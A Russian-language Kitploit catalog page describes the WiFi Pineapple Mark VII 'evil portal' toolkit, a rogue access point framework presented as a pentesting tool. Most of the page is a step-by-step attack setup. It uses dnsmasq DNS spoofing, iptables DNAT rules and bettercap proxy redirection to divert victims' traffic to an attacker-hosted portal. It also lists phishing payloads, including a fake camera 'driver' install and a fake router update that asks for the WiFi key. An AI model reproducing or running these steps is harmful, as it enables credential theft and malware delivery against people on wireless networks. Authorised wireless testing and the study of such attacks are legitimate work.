Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
WiFi-Pineapple-MK7_Evil-Portal — Инструментарий для создания мошеннических точек доступа для тестирования на проникновение в WiFi, развертывания вредоносных порталов фишинга для перехвата учетных данных и выполнения атак социальной инженерии в беспроводных сетях. | Kitploit
Инструменты/GitHubGitHub/tw-d/wifi-pineapple-mk7_evil-portal
Аудит Wi-FiФишингБезопасность беспроводных сетейТестирование на ПроникновениеСоциальная инженерияRed Teaming
GitHubtw-d/wifi-pineapple-mk7_evil-portal

WiFi-Pineapple-MK7_Evil-Portal

Инструментарий для создания мошеннических точек доступа для тестирования на проникновение в WiFi, развертывания вредоносных порталов фишинга для перехвата учетных данных и выполнения атак социальной инженерии в беспроводных сетях.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
112 лет назадЕщё не проверено

WIFI PINEAPPLE MARK VII — ЗЛОЙ ПОРТАЛ

  • Ведущий набор инструментов для создания подставных точек доступа и тестирования WiFi на проникновение для операций ближнего доступа.
  • Пассивные и активные атаки анализируют уязвимые и неправильно настроенные устройства.
  • https://hak5.org/collections/sale/products/wifi-pineapple

Author:: TW-D

Version:: 1.0.0

Copyright:: Авторские права (c) 2024 TW-D

License:: Распространяется на тех же условиях, что и Ruby

Requires:: Требуется PHP >= 8.1, Ruby >= 2.7.0p0 и WiFi Pineapple Mark VII 2.1.3-stable

Установка (дистрибутивы Linux на основе Debian)::

  • sudo apt-get install php8.1-cli php8.1-curl

  • sudo apt-get install build-essential ruby ruby-dev libpcap-dev

  • sudo gem install sorted_set bettercap

Описание

Злой портал — это техника, используемая для обмана пользователей Wi-Fi сети путем перенаправления их на вредоносную веб-страницу вместо ожидаемой страницы аутентификации или домашней страницы.

Примечание : Приветствуются "Issues" и "Pull Requests".

Протестировано на

Операционная система с веб-браузером / без негоТип уведомления
Ubuntu 22.04Нет
Android 8.0.0Системное
Microsoft Windows 10Нет
Raspberry Pi bookwormНет
Ubuntu 22.04 с Mozilla FirefoxОповещение
Microsoft Windows 10 с Mozilla FirefoxОповещение
Raspberry Pi bookworm с Mozilla FirefoxОповещение

Конфигурация

Хакер — Подключение к WiFi Pineapple

Подключите WiFi Pineapple к вашему компьютеру через кабель USB-C.

WiFi Pineapple — Веб-интерфейс

Настройки > Сеть > Режим беспроводного клиента : Интерфейс wlan2 должен быть отключен.

Хакер — Терминал 1

root@kitploit:~
hacker@hacker-computer:~$ ifconfig enx
enx: [...]
        inet 172.16.42.100  netmask 255.255.255.0  broadcast 172.16.42.255
[...]

(необязательно)
hacker@hacker-computer:~$ sudo nmap -sT -sU -p 53,5353 -e enx 172.16.42.1
[...]
PORT     STATE  SERVICE
53/tcp   open   domain
5353/tcp closed mdns
53/udp   open   domain
5353/udp closed zeroconf
[...]

hacker@hacker-computer:~$ ssh [email protected]
root@mk7:~# dnsmasq --address=/#/172.16.42.1 --no-hosts --interface=br-lan --port=5353 --no-resolv
root@mk7:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 53 --jump DNAT --table nat --to-destination 172.16.42.1:5353
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto udp --dport 53 --jump DNAT --table nat --to-destination 172.16.42.1:5353
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 80 --jump DNAT --table nat --to-destination 172.16.42.100:8080
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 443 --jump DNAT --table nat --to-destination 172.16.42.100:8000
root@mk7:~# iptables --append POSTROUTING --jump MASQUERADE --table nat
root@mk7:~# exit

(необязательно)
hacker@hacker-computer:~$ sudo nmap -sT -sU -p 53,5353 -e enx 172.16.42.1
[...]
PORT     STATE SERVICE
53/tcp   open  domain
5353/tcp open  mdns
53/udp   open  domain
5353/udp open  zeroconf
[...]

(необязательно)
hacker@hacker-computer:~$ dig @172.16.42.1 -p 53 www.google.com
[...]
;; ANSWER SECTION:
www.google.com.		0	IN	A	172.16.42.1
[...]

(необязательно)
hacker@hacker-computer:~$ dig @172.16.42.1 -p 5353 www.google.com
[...]
;; ANSWER SECTION:
www.google.com.		0	IN	A	172.16.42.1
[...]

hacker@hacker-computer:~$ cd ./WiFi-Pineapple-MK7_Evil-Portal/
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ php -S 172.16.42.100:8000

Хакер — Терминал 2

root@kitploit:~
hacker@hacker-computer:~$ cd ./WiFi-Pineapple-MK7_Evil-Portal/
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo "${BASH}" -c "echo 0 > /proc/sys/net/ipv4/ip_forward"
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo "${BASH}" -c "echo 0 > /proc/sys/net/ipv6/conf/all/forwarding"
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo bettercap \
--interface enx \
--gateway 172.16.42.1 \
--no-discovery \
--log ./logs/bettercap.log \
--silent \
--no-spoofing \
--proxy \
--proxy-port 8080 \
--allow-local-connections \
--no-sslstrip \
--no-http-logs \
--proxy-module ./EvilPortal.rb \
--redirect-url http://172.16.42.100:8000/

Хакер — Терминал 3 (Необязательно)

root@kitploit:~
hacker@hacker-computer:~$ curl --head --interface enx "http://neverssl.com/"
HTTP/1.1 302 Found
[...]
Location: http://172.16.42.100:8000/
Cache-Control: max-age=0, private, must-revalidate

hacker@hacker-computer:~$ curl --head --insecure --interface enx "https://www.google.com/"
curl: (35) error:0A000126:SSL routines::unexpected eof while reading

hacker@hacker-computer:~$ exit

Использование и загрузка пейлоадов

В каталоге "./payloads/" вы найдете:

РАЗРАБОТКААвторОписаниеКак использовать
skeleton.htmlTW-DПустой пейлоад, предназначенный для разработки.Документация
ВЫПОЛНЕНИЕАвторОписаниеКак использовать
web-camera.htmlTW-DИмитирует поддельное видео наблюдения и требует установки драйвера для его работы.Документация

веб-камера

ФИШИНГАвторОписаниеКак использовать
wifi_security-key.htmlTW-DИмитирует поддельное обновление интернет-оборудования и требует ключ безопасности WiFi для продолжения.Документация

ключ безопасности WiFi

Скачать инструмент